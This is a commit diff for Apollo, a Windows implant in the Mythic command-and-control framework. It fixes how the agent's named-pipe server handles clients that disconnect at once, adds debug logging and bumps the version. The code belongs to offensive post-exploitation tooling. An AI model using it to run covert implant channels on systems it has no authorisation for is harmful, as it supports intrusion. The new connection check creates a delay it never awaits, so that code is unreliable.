fixing named pipe server detecting closed clients

Author: its-a-feature

Payload_Type/apollo/CHANGELOG.MD

@@ -4,6 +4,12 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [v2.3.5] - 2025-03-03
+
+### Changed
+
+- Fixed a bug in Apollo's named pipe server that would break on writes for immediate disconnects from clients
+
 ## [v2.3.4] - 2025-03-03
 
 ### Changed

Payload_Type/apollo/apollo/agent_code/ApolloInterop/Classes/Pipes/AsyncNamedPipeServer.cs

@@ -1,9 +1,12 @@
 using ApolloInterop.Structs.ApolloStructs;
+using ApolloInterop.Utils;
 using System;
 using System.Collections.Concurrent;
 using System.IO.Pipes;
 using System.Security.AccessControl;
 using System.Security.Principal;
+using System.Threading;
+using System.Threading.Tasks;
 
 namespace ApolloInterop.Classes
 {
@@ -64,6 +67,7 @@ public void Stop()
 
         private void CreateServerPipe()
         {
+            DebugHelp.DebugWriteLine($"Creating Named Pipe: {_pipeName}");
             NamedPipeServerStream pipe = new NamedPipeServerStream(
                 _pipeName,
                 PipeDirection.InOut,
@@ -76,7 +80,23 @@ private void CreateServerPipe()
             );
             //NamedPipeServerStream pipe = new NamedPipeServerStream(_pipeName, PipeDirection.InOut, -1, PipeTransmissionMode.Message, PipeOptions.Asynchronous);
             // wait for client to connect async
-            pipe.BeginWaitForConnection(OnClientConnected, pipe);
+            try
+            {
+                pipe.BeginWaitForConnection(OnClientConnected, pipe);
+            }catch(Exception ex)
+            {
+
+            }
+
+        }
+
+        private bool IsPersistentConnectionAsync(NamedPipeServerStream pipeServer)
+        {
+            // Try to complete the read task within the timeout
+            var completedTask = Task.WhenAny(
+                    Task.Delay(500)
+            );
+            return pipeServer.IsConnected;
         }
 
 
@@ -92,6 +112,7 @@ private void OnMessageReceived(NamedPipeMessageArgs args)
 
         private void OnDisconnect(NamedPipeMessageArgs args)
         {
+            DebugHelp.DebugWriteLine($"Client disconnected from Named Pipe: {_pipeName}");
             Disconnect?.Invoke(this, args);
         }
 
@@ -100,7 +121,11 @@ private void OnClientConnected(IAsyncResult result)
             // complete connection
             NamedPipeServerStream pipe = (NamedPipeServerStream)result.AsyncState;
             pipe.EndWaitForConnection(result);
-
+            DebugHelp.DebugWriteLine($"Client connected to Named Pipe: {_pipeName}");
+            if(!IsPersistentConnectionAsync(pipe))
+            {
+                pipe.Close();
+            }
             // create client pipe structure
             IPCData pd = new IPCData()
             {

Payload_Type/apollo/apollo/agent_code/NamedPipeProfile/NamedPipeProfile.cs

@@ -28,7 +28,6 @@ internal struct AsyncPipeState
             internal CancellationTokenSource Cancellation;
             internal ST.Task Task;
         }
-        private static JsonSerializer _jsonSerializer = new JsonSerializer();
         private string _namedPipeName;
         private AsyncNamedPipeServer _server;
         private bool _encryptedExchangeCheck;
@@ -86,10 +85,17 @@ public NamedPipeProfile(Dictionary<string, string> data, ISerializer serializer,
                             byte[] currentChunkBytes = BitConverter.GetBytes(currentChunk);
                             Array.Reverse(currentChunkBytes);
                             DebugHelp.DebugWriteLine($"sending chunk {currentChunk}/{totalChunksToSend} with size {chunkData.Length + 8}");
-                            pipe.BeginWrite(sizeBytes, 0, sizeBytes.Length, OnAsyncMessageSent, p);
-                            pipe.BeginWrite(totalChunkBytes, 0, totalChunkBytes.Length, OnAsyncMessageSent, p);
-                            pipe.BeginWrite(currentChunkBytes, 0, currentChunkBytes.Length, OnAsyncMessageSent, p);
-                            pipe.BeginWrite(chunkData, 0, chunkData.Length, OnAsyncMessageSent, p);
+                            try
+                            {
+                                pipe.BeginWrite(sizeBytes, 0, sizeBytes.Length, OnAsyncMessageSent, p);
+                                pipe.BeginWrite(totalChunkBytes, 0, totalChunkBytes.Length, OnAsyncMessageSent, p);
+                                pipe.BeginWrite(currentChunkBytes, 0, currentChunkBytes.Length, OnAsyncMessageSent, p);
+                                pipe.BeginWrite(chunkData, 0, chunkData.Length, OnAsyncMessageSent, p);
+                            }catch(Exception ex)
+                            {
+                                break;
+                            }
+
                         }
                         //pipe.BeginWrite(result, 0, result.Length, OnAsyncMessageSent, pipe);
                     }

Payload_Type/apollo/apollo/mythic/agent_functions/builder.py

@@ -21,7 +21,7 @@ class Apollo(PayloadType):
     supported_os = [
         SupportedOS.Windows
     ]
-    version = "2.3.4"
+    version = "2.3.5"
     wrapper = False
     wrapped_payloads = ["scarecrow_wrapper", "service_wrapper"]
     note = """